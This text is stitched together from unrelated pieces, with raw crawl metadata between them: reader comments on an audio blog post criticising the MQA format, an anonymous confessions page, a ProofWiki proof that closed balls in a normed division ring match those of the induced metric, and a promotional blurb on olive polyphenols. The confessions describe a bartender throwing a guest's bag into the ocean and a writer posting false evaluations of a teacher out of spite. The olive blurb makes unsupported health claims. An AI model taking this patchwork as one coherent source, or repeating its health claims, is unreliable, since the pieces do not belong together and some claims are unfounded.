Lastly this, a conclusion there wasn't space for with my original post. You, Archimago, may be viewed as a "tireless" MQA opponent and I as a "tireless" MQA apologist/dupe/shill (or whatever insult the next troll up to bat comes up with.) But I think we're both getting tired at this point. I'm bowing out as an active participant for now but will continue to regularly check in on your blog on this and other topics (there are other topics in audio, right?) Thanks again for the chance to respond to your comments.
5. Hello Andrew,
Thanks again for your post and clarifying the position.
To be honest, although I obviously have not read every piece of commentary on MQA out there, I'm just not seeing the outrage against MQA as somehow terribly out of proportion! From my perspective over the years, audio forums have been mean-spirited and I certainly remember back in the day being an "objectivist" on many forums receiving all kinds of unkind comments or uncalled for banning even when I'm not the one who emotionally "lost it". I certainly do not want things to be mean-spirited, but there is also a limit to censorship as well. Perhaps the worldview is changing as rationality is increasing and questionable technologies like MQA are seriously being debated and criticized. This IMO is not a bad thing although obviously there are limits to the harshness of comments publicly acceptable. I see recently for example that Michael Lavorgna had to be restricted at Computer Audiophile for some extremely rude remarks which I have never seen the likes of in these parts at least. Steven's comments about Mr. Harley is clearly mild in comparison and if Mr. Harley has expressed belief in things like unidirectional conductor crystals, then maybe that's something he has to address to win back Steven's faith... I trust this should not be hard to address and nothing here is unpardonable!
While I can appreciate what MQA is doing and trying technically, at the end of the day, I just think it is useless and a waste of effort for something that is being misrepresented by the company as "revolutionary" in their advertising and this is exacerbated by comments like Mr. Harley's equating it as a scientific "paradigm shift". If the tables were turned, would you also not feel some genuine sense of indignation if you also see objective results time and again even with blind tests demonstrating the inaccuracy of such claims? While I prefer to debate with objective data and tests, Linn thinks of it as a money grab to control the supply chain (isn't that what the business and stakeholders would love?), others are concerned about expanding DRM (possible). And taken together some do call this a "scam". While I do not use such words as I cannot be sure of intent, it doesn't take much imagination to derive where that sentiment might come from and people do have the right to express these beliefs just as much as Mr. Harley might over-reach with "paradigm shift".
As for James Randi, well, as a hobby we do not need that kind of exposure or challenge. The fact that we do is a problem in itself. I can't speak about your friend and reading the contents of an LP by sight... But I do doubt Mike Fremer's ability to hear differences between normal lengths of Monster vs. megabuck brands of cables assuming that the cables aren't fooling around significantly with the LCR parameters. A blind test can certainly be arranged I suspect among folks here and on the various forums - I vaguely remember Agitater on Steve Hoffman Forum suggesting something like this in Toronto :-).
You are correct that my day job is in the medical field. And perhaps we do share that sense of proportionality in being reasonably balanced. For the purpose of this blog, my desire is to see true *value* being provided with new technologies in the hobby. While the "high end" might see the hobby as an intersection of science and art, I'm for "high fidelity" which is much more science than art - let the music as art be a manifestation of accurate, uncolored sonic reproduction. And MQA as a file type IMO lives squarely in the "science" domain.
As such, I see myself as more a tireless advocate for high fidelity... The majority of my posts are obviously not about MQA directly even though once awhile there are bursts as in recently times.
Thanks for your comments... See you around.
6. Agree with your comments Arch. I too don't think of Atkinson and Harley as charlatans but they are heavily compromised. I lost respect for Atkinson back in the 80s when he, and other Stereophile staff failed the Carver Challenge (see the link below). Initially he was gracious about it but later changed his tune to one usually employed in the psuedosciences, ie double blind tests are flawed and after time spent with subjective listening, he can now hear the difference between the amps. The reality of course is that he was in an impossible position. How could he and Stereophile go out and tell consumers that a $700 amp can be made to sound identical to a $20k amp while keeping his advertisers.
Unfortunately most of the good review publications have now disappeared. There just isn't enough of a subscription market to keep them alive without advertising/industry dollars. One of the last of the good publications, The Audio Critic closed due to the retirement of the late Peter Aczel. If anyone wanted to look at a good review publication, some of their back issues are available free of charge at the link below.
Btw, if you want a chuckle, have a read of Michael Fremer's letter to the editor and Aczel's reply in issue 21.
7. Thanks for the note Prep 74,
I believe you are correct about the nature of publications. This is why I do feel for Atkinson whom I can respect in that he has maintained an element of objectivity within a "high end" culture where subjectivity seems to have ruled the land for decades. Of course, this does not excuse things like the Carver Challenge, but the dude has to pay the bills over the decades as the media in general has been in decline.
This of course leaves us with perhaps the highly likely uncomfortable truth. Ultimately, for small hobbies like "high end" audiophilia, the media is "compromised" due to the necessity to keep the boat afloat financially. As much as anyone insists on a "Chinese wall" between the editorial and advertising departments, is it truly possible (as per your example of the Carver challenge)? Perhaps impossible to not be psychologically influenced at least in some level.
Thanks for pointing out that Michael Fremer "Letter to the Editor" in Aczel's (RIP) Audio Critic magazine issue 21 (1994). LOL. Too bad the "homo incident" was at a time before ubiquitous smartphones and video... Would have made a great YouTube video of a digital vs. analogue audiophile brawl high-noon in CES at the Velodyne enhibit :-).
I find Mr. Aczel's response regarding his 1980 statement decrying the "digital epidemic" interesting. Not often that we see a response admitting one's mistaken attributions, and admission of being "dead wrong". There is certainly no shame in changing one's opinion and this could be redeeming.
8. Thanks for the exchange Archimago & Andrew
I think the consumer reaction against MQA has really caught the traditional audiophile trade publication and general promotion machine off guard. Many reasons for this, but one is that theirs is a world that is insulated from the larger digital and electronics world. What they still don't understand is that MQA, unlike the "art and wine" world of Audiophiledom in general and dubious tweaks in particular, relies on very well known and understood EE principals. Yes yes, there is a "craft" to implementation in electronics but math is math, and digital is first and foremost software and math. I almost feel for Andrew, in that he and all the other "sounds like" opinion makers are truly out of their element in digital in general and MQA in particular.
One good thing MQA has done is prompt a consumer debate around whether Audiophiledom is truly like "art and wine" and if it is, is it this way out of necessity or has the culture/hobby simply gone in this direction for reasons that are changing and changeable. Does Audiophiledom have to be so radically subjectivised (and thus a prime target for voodoo salesman such as Bob Stuart), or can their be a balance - something akin to the older idea of "High Fidelity" which necessarily implied a non subjective thing "out their" in which to be fidelius to.
When I look at the younger "personal audio" audiophile I don't see in him or her nearly as much willingness to go along with the present culture of the "audio savant" designer/manufacturer/trade publication writer whose reputation is more important than an objective measurement or sound, repeatable design principals. This kind of audiophile wants to see real $value$ and less bling. He or she is much more likely to understand the digital ecosystem, and what a DRM/proprietary format means to that ecosystem. This person is an enigma to the world Andrew spends most of his time and thus he misinterprets this persons viewpoint on MQA as something "political" or socially constructed.
Traditional audiophiledom still has much life in it, and "high end" is where most manufactures want to play simply because it is probably easier to sell one $2k magical digital cable than it is to sell a hundred well built and in spec ones. That said, I sense the march of time and progress and the real opportunity for sites like this to be part of the coming "High Fidelity" revolution...
9. Hey there f48f...
Thanks for your comments. Certainly hitting on many important themes and expanding on the "art and wine" sentiments of the "high end" where justifications are made for the subjective "art" side of hardware being perhaps a reasonable part of the price tag asked of the consumer.
I can certainly appreciate fine art and the importance of art in life. Obviously music lovers find this natural otherwise we would not invest our time and money into this pursuit!
Over time, the science and engineering side IMO has become so mature that audible difference have become so minute as to be indistinguishable. Sure, there could be brilliant designs and "new" ways of getting things done, but now days, off the shelf DACs and power amplifier modules have gotten to the point where in the utilitarian aspects of sound quality, size, efficiency, and features, the price of entry has become so reasonable that one questions the "need" to have any special "savant" designer work on yet another high priced 50lb amplifier! Sure, we can spend more if the material is excellent, if it's hand-built, etc... But we must of course realize that these qualities in themselves do not result in necessarily better sound quality nor reliability.
While I can appreciate the beauty of some of the audio products from an industrial design perspective, for me personally, it's one of these "non-utilitarian" functions and typically not that important to me... I don't buy amps, DACs, speakers to be "furniture", nor do I need these things to adorn my home like jewelry :-). Is this a result of my *culture* rather than "politics" of my generation (I'd be one of the early Gen-X'er)? We will see!
Finally, I also do not see audio hardware like "fine art". If I were to invest in art, an important factor in that is expectation of price appreciation. The subjective value of those items is understood as having artistic merit, reputation of the artist, and thus correlated to price. As a group, I have not see vintage audio hardware appreciate to a large degree in price. Some items (like vintage tube amps) might be sought after by a relative few based on sentimental value. Might as well put it into actual artwork, or better to even sit in objects of investment grade value like precious metals or real estate rather than $100,000 speakers, etc. Nothing wrong with $100,000 speakers, amplifiers, etc. but again, that aspect of *value* is just something that each of us will need to sort out for ourselves...
Back to MQA then. I think you're right, it has provided us an opportunity to explore something that is presented to us as having a utilitarian value of improved sound quality. It is being sold to us as having the stamp of approval of a respected name in audio - Bob Stuart. For some this might be enough. But when judged based on objective metrics, selling based on reputation IMO is clearly not enough. Just as it wasn't enough using an artistic spokesperson like Neil Young (and his buddies) a few short years ago!
2. Another nicely written piece. Although I did not participate this time, in your "testing" I hear no difference in quality with MQA. It's all about the mastering in my opinion. And as you mentioned in your blog, Sony and Phillips did their homework years ago with the redbook standard.
Always enjoy a weekly read on your blog! Please keep it up.
1. Hey Gadget,
Thanks man. Next time don't miss out on the testing, dude :-).
3. Thanks for your series of articles and the work you put into them.
I too am also tiring of the MQA discussion, it is like the bad rash that won't go away! :)
MQA reminds me of the push to redesign the milk carton here in the US by Walmart and Costco about 10 years ago. Two large industry retailers (music companies) with some dairies (hardware companies) had come up with a "better design" for the simple milk carton (music files) that had all kinds of advantages, so they said. It would revolutionize the delivery of milk, be more environmental and consumer friendly and cheaper! Consumers had to be given in store demonstrations on how to use the damn thing and eventually rejected it as complicated, unnecessary, and unwanted. Maybe MQA should look to that tale as a guide, that no matter what the "experts" on either side of the argument say it is the consumer who has the ultimate decision in the matter and will decide the ultimate fate of MQA. And when I say consumer I mean the vast population outside of the audiophile world. Stop with the audiophile conceit this is any kind of meaningful market beyond the small, and getting smaller I would imagine, little audiophile bubble.
1. Hi Jim,
Thanks for the link. Ahhhh, no wonder when I head to Washington State to visit the local Costco, I see those strange milk containers! I remember more than a year back buying one of those and thinking what a hassle it was to pour compared to the usual spout or plastic milk containers.
Interesting analogy!
4. Excellent article as usual...there is not that much ADC supporting MQA encoding.
Only Mytek seems to offer an ADC that could handle MQA encoding.
Lately I tested this player (yep an another one...), that sonically sound very detailled and articulated compare to the usual suspects.
Give it a try...Windows only, not very friendly but the results are comvincing.
1. Interesting, Blogue. Another software player for audiophiles, eh?
Well... Time permitting it might be fun to run tests with this and the other Japanese audiophile player - Bug Head Emperor!'
Obviously, given what we know about computer data communications and asynchronous USB DAC technology which most of us utilize, we really do need to be suspicious of claims :-).
2. Playpcmwin give excellent results even with low cost dac.
The files are played trough RAM (as many others) but it seems there is a way to packed then correctly.
5. I've recently been using the 1by1 player - it has no special audio features, but I find it a pleasure to use.
1. Interesting Tony... Another small audio player. Looks like a clean layout.
6. You nailed it again.
MQA obviously is getting hysterical.
They have nothing to offer, but need to sell.
That's why all these hype articles pop up.
That's why all these shills and sock puppets appear in "make-believe" forums like Steve Hoffman and praise and preach.
But, still, they don't get through into mainstream press.
MQA is a conversation piece for "audiophiles" like pono or HDCD and will vanish like these.
1. Hi Tim,
With each passing day, month, year, the need to turn a profit on this is strong, I suspect. No doubt there must be pressures to get the job done with expectations not just for themselves but for the partners.
Considering that Tidal is really the only significant source for MQA consumption, I still wonder what kind of #'s we're seeing with subscription and whether MQA provided much of a draw since they started streaming in January. Was there much growth in the Tidal HiFi subscription base?
2. Hello Archimago,
I feel that "Hi-Res" downloads or streaming by itself is a niche market. If I had to pay prices like on the "Hi-Res" download sites, I would rather like to have a physical product.
On the other hand, if I don't care for a physical product, I feel the MP3s from Amazon or other sites, for less than a Euro per song, are good enough.
So, I think, practically all downloads are MP3s. Uncompressed is a niche, because only a few people appreciate the superior sound quality of uncompressed - however, in most cases 256 or 320 MP3 is sonically transparent to uncompressed CD.
Within that niche, "H-Res" is even a smaller niche, and within that niche in the niche, there is MQA in a niche.
I guess, that's why they get so hysterical.
They know, their business model is bad.
MP3 was a good business model.
Dolby Dgital Surround, dts, were good business models upon introduction into the market, via DVD.
Because, they provided feasibility of new audio technology:
MP3: Music over the net.
DD, dts: Surround sound in your home (on DVD, for example).
MQA: Digital Rights Management (yes, the consumers love that!)
3. Absolutely Tim. Well reasoned.
By right, MQA should be a niche product. I suspect though that Meridian/MQA/music labels have strong aspirations. It is without doubt a sort of "weak" DRM at this point that's mostly an annoyance. But in time, there is certainly potential for it to impose a stronger form of control. This is the "other side of the coin" for their claim of it being "Authenticated".
Ultimately MONEY TALKS. In my "What is the Value of HRA?" post in 2015:
I spoke about how I might (and have) bought hi-res only if the price is right. In my opinion, if a CD is $10, I *might* be willing to spend $13 for the hi-res PCM download assuming the piece of music can benefit (NOT most rock and most certainly not pop stuff like P!ink, Bruno Mars, Beyoncé).
At this point knowing what I know, what I've heard, having discussed the technicals with folks like Mans, reviewed the blind test results... I can say that for myself the value of an MQA-encoded album is more like between an MP3 download and an actual CD! With the hassles this things adds and the lack of evidence (and in fact, potential technical degradation), there's no way I would even spend $10 on an MQA download. I would experience much less hassles, enjoy actual ownership, and achieve essentially the same sound from a CD I can rip and store for backup.
The business model is catered on themselves and perhaps appeasing the music labels (as DRM). It's not consumer centered. I appreciate that businesses are interested in their bottom line, but when it's IMO at the expense of consumer interests, then clearly as others have said, this is solving a "problem" the consumers did not ask for!
7. From the extremely strange TAS article you referenced: "All we can say is that the effect on DAC performance [of boxes of BBs placed on high priced audio components] produces authentic goosebumps of pleasure." Why no photos of those "authentic goosebumps"? That would have been at least as strong evidence as to their conclusions as the other testing procedures outlined in that article! Always enjoy your critiques, thank you.
1. Hey Martin,
Those articles by Zeilig and Clawson which included a series on computer audio I think in 2014 were a hoot. Total mish mash of assertions, opinions, delusional insinuations, loose associations dressed up in supposed scientific methodology!
Really frightening that TAS would print something like these in all seriousness and speaks to the poor credibility of the editorial process that they would pass muster. Embarrassing. At least the article should have included something to the effect of a disclaimer to suggest that the TAS editorial board may not have been unanimous in accepting the articles claims/conclusions!
2. I am in awe of your output... you have a full time job, yet this blog seems like a full time job to me!! I love it, a revelation after reading the usual hifi magazines. I first found you via your review of the Google chromecast audio, a wonderful device, but almost certainly not to be found in the pages of audiophile magazines!
3. Yes they are a hoot, I find the kooky TAS articles hilarious. Sorry for the multiplicity of replies
4. Greetings Martin,
It has been fun putting this blog together over the last 5 years.
Yeah, life is busy with the job, family, extracurricular activities :-). Something I realized after reading the usual on-line audiophile sites over the years is basically that so much of what is written contains little actual *content* that can be generalized over the years. Subjective opinions and listening only goes so far with IMO little enduring value. This is why I try to aim for topics that can be useful not just for today but hopefully going forward.
IMO the only way to do this is through exploring objective measures, demonstrations when possible, getting the readership involved in some blind testing if possible... And general debate like this!
Compared to most blogs, I've only posted 250 items over the years here! My hope though is that the material is denser and articles more complete so as to provide a useful resource to audiophiles in a way that's not afraid to ask questions or that may be counter to the current audiophile system of beliefs. Even when the day comes when my life becomes too busy to work as much on the blog, or I move on to other pursuits :-).
5. Yes, Archimago,
your articles contain a lot of real content.
The denisty of information and facts is much higher than in "audiophile" websites.
Practically nearly all "audiophile" magazines, online or print, don't do any critical objective testing.
But simply, every new piece of gear is "excellent". Embedded in lengthy "feel-good" bla-bla about "listening" to some records, namedropping included.
The usual "audiophile" forums on the other hand, follow suit, and discourage objective listening testing (e.g., blind tests) by forum rules.
6. The invention of MQA seems to me to be simply adding confusion to a market already well served by audio codecs, lossy and lossless. I was astounded to hear Bob Stuart in the youtube interview you linked to claim that MQA is lossless, and in the same breath say that they are only including the "necessary" audio information, based on their review of the neuroscience. That is grossly misleading, to say the least, is it not? If his issue is really with the current state of A/D converters, they should have invented a better chip. It seemed that the interviewer was a little annoyed with the slippery nature of Stuart's answers to his questions.
8. Re: Harley and copper, read it and weep, or laugh
"Another term associated with copper is LC, or Linear Crystal, which describes the copper’s structure. Drawn copper has a grain structure that can be thought of as tiny discontinuities in the copper. The signal can be adversely affected by traversing these grains; the grain boundary can act as a tiny circuit, with capacitance, inductance, and a diode effect. Standard copper has about 1500 grains per foot; LC copper has about 70 grains per foot. Fig. 1 shows the grain structure in copper having 400 grains per foot (illustration on the right). Note that the copper isn’t isotropic; it looks decidedly different in one direction than the other. All copper made into thin wires exhibits the chevron structure shown in the illustration of Fig.1. This chevron structure may explain why some cables sound different when reversed."
This is typical of Harley's constant stream of pseudoscience.
And btw, 'audio engineer' does not necessarily mean 'electrical engineer' -- and in my experience of them, some 'audio engineers' (recording engineers) have claimed some very foolish and ignorant things indeed about audio. Is Harley for a fact an degreed EE?
As for Fremer, another joker in the audiohile pack, I would be happy to take the bet that he couldn't tell (grossly overpriced) Monster from (obscenely overpriced) 'high end' cables in a fair, aka double blind, test. Ans as per Randi, fair also means one where the cables' standard measured characteristics didn't predict audible difference. (That proviso is necessary because there *are* bizarre 'hi end' cable products that could purposely degrade the sound in order to give them 'a sound' -- and Fremer is 'street' enough to know and exploit that)
1. I read the kooky articles in TAS just for the entertainment value!
2. Years ago Peter Aczel started a fund drive to send Harley to EE school. I think he got about $50. Harley claims now he has a degree in something, and has even taught. Who knows? Maybe it was all some audiophile Make-A-Wish thing. ("Class? This is Professor Harley! And what do we say when we meet someone new, children?"
Fremer, OTOH, is simply a nasty, obnoxious person. Ignorant and vindictive, he nonetheless has parlayed audio quackery into some sort of living, proof indeed there is no justice at all in this world.
3. I enjoy Fremer, his tour of his audio room at his house on Youtube recently was easily the most entertaining of the crib tours so far on Stereophile youtube channel
4. Funny stuff Jeff. Raised $50 for Mr. Harley to go to EE school? I didn't know about this.
Oh... Fremer... Yeah... Some entertainment value I suppose, but that persona is problematic. I recently read that he provided testimony at the Michael Jackson vs. Quincy Jones legal case but his testimony was excluded by the judge. Strange that he would be asked to be an expert witness (the article noted that he had never even met Jackson and doesn't know Jones). How odd... Maybe one could call him up to testify about turntables and record pressings, but I'm not sure he would be an authority about the "spirit" of Michael Jackson's music :-).
9. And if I may...way down in comments in that absurd TAS copper cable article, comes a claim by a reader, that gets right to the nub of what TAS-style audiophilia *get wrong*:
1. Thanks Steven for the link and discussion.
I'm getting too old to weep over articles like these, so I choose to laugh about the claimed significant effects of these qualities he speaks of in the crystal structure :-).
Yes, AE is not EE and I as well have heard of strange claims from the AE crowd. At least most of the ones I come across seem pretty reasonable and level headed.
Fremer... Yeah, most of these guys are smart enough to know where their limitations lie I think which is why they avoid blind testing even though they'll talk big as if they aced a bunch back in the day.
I would happily take the bet that he would not be able to identify 2 cables in a blind test of similar LCR characteristics regardless of cost.
10. Hi Archimago,
would you consider audiophool world of products to be suffering from planned obsolescence? Because from what I observed, it does, albeit in its own peculiar yet predictable way - the new device always sound better. But then, there are also vintage lovers.
1. There's no contradiction there. Without new products, there would be no old ones for the vintage lovers.
11. As a pro audio manufacturer for 25 years, what worries me is how marketing based "consumer physics" is now being applied to pro audio. There are a few old boys like me in the industry who essentially have perfected audio transmission and reproduction. We know the limitations, and they certainly aren't solved by hi res, or new codecs. We know how studio techniques "create" music, not reply systems. If properly engineered, for consumers, everything is now down loudspeakers, and has been for a while.
While I can understand the need for humans to feel in control, and alter their environment, MQA is different. It is an industry attempting to bend production techniques, essentially for monopoly profit, and it worries me. We've just gone through 20 years of loudness wars, dictated by marketing, and I don't want to go through another set of format wars based on poor evidential science. I admire Bob Stewart, and briefly worked for him, but at a recent AES he admitted that he had not performed scientific listening tests on MQA. This is not the basis of starting a new production format.
1. Thank you Unknown,
I appreciate the comment and you feedback from a seasoned voice.
I see that Mr. Stuart spoke at the AES as recent as this past Friday in NYC (with Bob Ludwig and Ian Shepherd). I hope that was recorded. Was it at that event that you spoke to him? On another forum there was also this AES "brief" mentioned:
It looks like this is *just a proposal* with no actual research done yet! As far as I know, the only numbers I see coming from a blind test are the ones presented here.
Indeed, it would be very disturbing to hear that an industry would get behind a product that is not actually tested. In that light, I would also say that it would be very unethical for a company to represent itself as capable of delivering all these superlatives of "everything" heard in the studio, or "a new paradigm", etc... if actual scientific studies have not been conducted!
2. Sorry about the unknown tag, I couldn't figure out quickly how to get my own name to appear. I got the MQA news second hand via another engineer. If you can PM me, I can give you more details.
I'm not sure this will get industry acceptance, but anything can happen in todays wonderful world where we have to keep on re-inventing wheels to sell more carts...
3. Hello unknown / Crispin,
I appreciate your sentence, "If properly engineered, for consumers, everything is now down loudspeakers, and has been for a while."
Exactly, that's what I feel, too. With CD, digital transmission and hard disk recording, most of the consumer gear is at a level where sound quality is only limited by the speakers or headphones.
Now, how to sell new music gear...?
1st) Create new formats, like surround.
But, after 5.1 surround, how many would like to upgrade to 7.1 or 11.2 surround...?
2nd) "Consumer physics", and the believe, that "EVERYTHING" makes a sonic difference.
And, the last also creaps into pro audio.
4. Thanks Crispin,
I've heard that Bruno Putzeys has been vocal as well and actually brought up concerns at that AES session on Friday! Since I'll be heading off overseas soon, please get in touch with me on Computer Audiophile via PM. Will be great to chat...
5. Thanks for the note Tim.
Yup. It's about the speakers and expanding immersion, potentially with multichannel but even that has a limit!
As I wrote above, if a CD is worth $10, I would not even spend that 10 bucks on an MQA album download!
6. Congrats Archimago - from the text of the brief it seems somebody is copying your MQA-blind-listening test ;)
12. Fyi
It's from a Meridian competitor, but does highlight some recording industry concerns.
13. I watched 32 mins of the RMAF MQA LIVE. Who is this guy? his noise to content ratio is like 80%. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '43', 'language_id_whole_page_fasttext': "{'en': 0.9623781442642212}", 'metadata': "{'Content-Length': '237660', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:UD7N3FF6LOEES6IR443LRRJ26BRRX7IE', 'WARC-Concurrent-To': '<urn:uuid:49250c1f-a553-4d11-ad47-43a12bb2c483>', 'WARC-Date': datetime.datetime(2018, 12, 14, 12, 44, 2), 'WARC-IP-Address': '216.58.218.225', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:C74TOZRWU4PXYP5OL4WPNFFCR62LX6AL', 'WARC-Record-ID': '<urn:uuid:d38f6571-4a51-4e40-8312-2f1670b40be3>', 'WARC-Target-URI': 'http://archimago.blogspot.com/2017/10/mqa-final-thoughts-on-politics-paradigms.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:d7b8290e-c778-414e-8c1c-772e585fd966>', 'WARC-Truncated': None}", 'previous_word_count': '11019', 'url': 'http://archimago.blogspot.com/2017/10/mqa-final-thoughts-on-politics-paradigms.html', 'warcinfo': 'isPartOf: CC-MAIN-2018-51\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for December 2018\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-237-242-155.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.050396621227264404', 'original_id': 'cd8b5c385246d6037d41acd6de69f6776638444deb78dfbe63b583c909d55ae2'} |
Search confessions
20% better
I was “alone” (think Seinfeld) and afterwards listened to seminal hard rock anthem Dr Feelgood from Mötley Crüe. It sounded better and was already an awesome song to begin with!!!
Think I need a third party's advice on a situation that I can't seem to move on from. I'm having trouble asking for assistance or advice. " Help " I guess. Wow I had trouble even typing the word. Am I afraid that once the ball is rolling. It's really rolling..... It needs to roll. Time
Luxury yacht employee with dirty secret
I was working on a luxury charter yacht sometime in the 00s. It was a lot of fun and we dealt with very eccentric people. One night we were hosting a family reunion for quite a large international family. There were nationalities present. I was bartending that night and had the pleasure of conversing with them. Thru out the night I met an odd elderly couple from Australia. The woman looked like a bedazzled Miss Frizzle and the husband like any regular bloke. The woman would come to the bar and drink nothing but grandmarnier. After about 2-3 hours into the cruise the woman came up to me and asked if had seen her Australian flag tote bag. She said it had her thongs(flipflops), purse and cellphone in it. The staff team took this request quite seriously and started to search all three decks. After an extensive search there was still no sign of the bag. Where could it be right? She would keep coming up to ask us if we had found it. Mind you she had finished half a bottle of GM. We started to assume she was crazy and had dementia. I was the biggest factor in this accusation as I had started the whole discussion. Even going as far as making jokes about her dementia... She was really annoying tho... Nearing the end of cruise underneath the lions gate bridge I was relieved of my bar duties, I decided to take my camera and take some photos of the starry night from the top deck. I walked out onto the deck, everyone had gone inside, it was just the jazz musicians gathering their belongings. We chat a bit and I help them take down some tables they were using. As I pulled the table cloth off one of the tables, something caught my eye. I looked underneath and there it was...... The fucking bag she was looking for. I look inside and sure enough the contents are confirmed hers. I remembered all the jokes I had made and couldn’t bring myself to recant them and assume error. Then all of a sudden without any hesitation my brain told my arm to grab the bag and throw it off the side and into the ocean. It landed with a small splash and sunk like a sack of potatoes. I wonder if she ever became crazy causeof me.....
Contrary to popular belief
I’m not a recluse as some people think. I just avoid the clubs, pubs and bars at all costs because that stuff is not my scene. I prefer to spend time doing my usual routines such as working out at the gym, going grocery shopping and getting a hair cut.
Not Satisfactory
Years ago a woman who works as an instructor refused to go out with me so I wrote poor teaching evaluations for her online. I feel bad about it now.
Moving To Montreal
The first thing people say is: "It's cold" Then they ask "Do you speak french?" I mention I can afford to buy a place there and they shut up. The wheels start turning.
Coming down with the flu
I can remember some seriously sick person coughing on my on the #14 three days ago too... Fuck. I hate sick people on the bus.
Beer store tantrum
Pouring out the tip jar in front of my face because I didn’t tip you for ringing in a 20 dollar bottle of booze? I work in the service industry and work damn hard. I know how to tip. That was laughable, thanks for making my day.
It's me making it difficult for you!
I take the bus. At the first stop on the south side of one of the local bridges, there is a person who gets on, with regularity, during the weekday rush. This person is insistent on bashing their way through to the back of the bus. The bus is always packed and it's a struggle to move around to accommodate this person. As well, they never says "excuse me". 9 times out of 10- there is no seat waiting for this person and the high-and-mighty effort they made to get to the back of the bus was rude, unnecessary and often challenging for those pushed out of the way. The thing is, if this person waited 1 stop- 1 stop!- the bus would clear and they would have their pick of seats. I confess to blocking this persons path and/or making it difficult for them to push their way past me. Wait your turn and you'll get to your precious seat.
You can learn a lot
Breaking up with someone you love is one of the most painful experiences one can go through. So there’s got to be a very good reason why someone would choose to do it. From my own experience with one person (on and off relationship), I’ve learned that you can learn more about a person’s character by how they behave in a breakup than just about anything else that they do. If someone has been insensitive in the actual relationship, count on them ramping up that behaviour 100%. If they’ve been cold and unemotional, same thing. So paying close attention to this particular situation is extremely important, so that the difficult decision you made to end things in the first place can teach you never to repeat it again. I think I’ve finally learned my lesson.
Two Parrots bar bathroom
I rolled into the bathroom or Two Parrots and you and your friend wanted to touch my hair. You...
More on | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '7', 'language_id_whole_page_fasttext': "{'en': 0.9809420108795166}", 'metadata': "{'Content-Length': '67908', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:CVPJZDYULO7H6ZZ3L2EU5FMGEMHDPPNS', 'WARC-Concurrent-To': '<urn:uuid:b80043b6-573a-48aa-ac1f-6e8aa448f7dd>', 'WARC-Date': datetime.datetime(2020, 1, 29, 0, 18, 3), 'WARC-IP-Address': '50.19.98.143', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:OHLUGWHFLE5KM2PGD3ZUFLWMFWRXLPG2', 'WARC-Record-ID': '<urn:uuid:29170300-3352-46be-9a25-65d85ba33dd4>', 'WARC-Target-URI': 'https://www.straight.com/confessions?body_value=&text=&rate=-czBIUQyMz1mStU9ClpEWp9jk8nkpTHJEFRU7ldVBck', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:b423c6a7-6086-4f7b-94bb-6d893870a529>', 'WARC-Truncated': None}", 'previous_word_count': '1030', 'url': 'https://www.straight.com/confessions?body_value=&text=&rate=-czBIUQyMz1mStU9ClpEWp9jk8nkpTHJEFRU7ldVBck', 'warcinfo': 'isPartOf: CC-MAIN-2020-05\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for January 2020\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-48.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.03559529781341553', 'original_id': '125d32c8e8a5a6eef89fa54207aa335c724a707f6fc757506996e4efe6a9bdd6'} |
\section{Closed Ball in Normed Division Ring is Closed Ball in Induced Metric}
Tags: Definitions: Closed Balls, Definitions: Normed Division Rings
\begin{theorem}
Let $\struct{R, \norm {\,\cdot\,} }$ be a normed division ring.
Let $d$ be the metric induced by the norm $\norm {\,\cdot\,}$.
Let $a \in R$.
Let $\epsilon \in \R_{>0}$ be a strictly positive real number.
Let $\map {{B_\epsilon}^-} {a; \norm {\,\cdot\,} }$ denote the closed ball in the normed division ring $\struct {R, \norm {\,\cdot\,} }$.
Let $\map {{B_\epsilon}^-} {a; d }$ denote the closed ball in the metric space $\struct {R, d}$.
Then:
:$\map {{B_\epsilon}^-} {a; \norm {\,\cdot\,} }$ = $\map {{B_\epsilon}^-} {a; d }$
\end{theorem}
\begin{proof}
{{begin-eqn}}
{{eqn | l = x
| o = \in
| r = \map { {B_\epsilon}^-} {a; \norm {\,\cdot\,} }
| c =
}}
{{eqn | ll= \leadstoandfrom
| l = \norm {x - a}
| o = \le
| r = \epsilon
| c = {{Defof|Closed Ball of Normed Division Ring}}
}}
{{eqn | ll= \leadstoandfrom
| l = \map d {x, a}
| o = \le
| r = \epsilon
| c = {{Defof|Metric Induced by Norm on Division Ring}}
}}
{{eqn | ll= \leadstoandfrom
| l = x
| o = \in
| r = \map { {B_\epsilon}^-} {a; d }
| c = {{Defof|Closed Ball}}
}}
{{end-eqn}}
The result follows from Equality of Sets.
{{qed}}
\end{proof}
| math_pile | {'subset': 'ProofWiki', 'meta': "{'type': 'Theorem_Proof'}", 'original_id': '2f2c3e2e7293eaab9018480159235105b624f2e9e2d41f8e7a416d0272c3fde0'} |
Olives are highly regarded for their magical healing powers. Scientific studies have since identified a family of powerful antioxidant compounds in olives called polyphenols or biophenols. Olive biophenols protect the skin, maintain healthy joint functions, promote cardiovascular wellness and remodulate the immune system to respond appropriately to infection.
